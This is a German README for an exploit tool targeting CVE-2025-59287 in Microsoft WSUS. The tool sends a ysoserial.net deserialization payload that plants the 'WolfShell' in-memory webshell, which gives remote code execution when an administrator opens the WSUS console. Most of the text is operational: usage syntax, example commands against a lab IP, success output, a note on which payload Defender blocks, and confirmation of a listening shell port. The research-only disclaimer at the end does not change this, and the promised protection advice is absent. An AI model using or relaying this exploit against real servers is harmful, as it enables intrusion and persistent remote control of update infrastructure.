
Exploit für CVE-2025-59287, der eine WolfShell-In-Memory-Webshell in WSUS-Server injiziert, um Remote-Code-Ausführung zu erreichen, wenn die Administrationskonsole geöffnet wird.
CVE-2025-59287 — Injektion von WolfShell Wolverine Forward Memory Shell
CVE-2025-59287 nutzt einen Logikfehler in WSUS-bezogenen Komponenten aus, um die WolfShell-Memory-Shell in den Zielserver zu injizieren. Wenn ein Administrator die WSUS-Konsole öffnet (standardmäßig wird sie innerhalb von 1–30 Minuten zufällig ausgelöst), wird die Memory-Shell aktiviert und führt zu Remote Code Execution (RCE). Dieses Dokument enthält Nutzungsbeispiele, benötigte Dateien und Schutzempfehlungen.
Senden Sie ein ysoserial.net-Deserialisierungs-Payload an den Zielserver, Funktion individuell anpassbar. Dieses Projekt demonstriert die Injektion der Wolverine-Memory-Shell
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender blockiert und löscht, nicht verwendbar

Wie im Bild gezeigt, wird Port 7556 erfolgreich abgehört, was bedeutet, dass die Wolverine-Memory-Forward-Shell injiziert wurde


Dieses Dokument dient ausschließlich Sicherheitsforschung und Schutzzwecken. Verwenden Sie die zugehörigen Exploit-Codes nicht für nicht autorisierte Systeme oder Angriffsaktivitäten.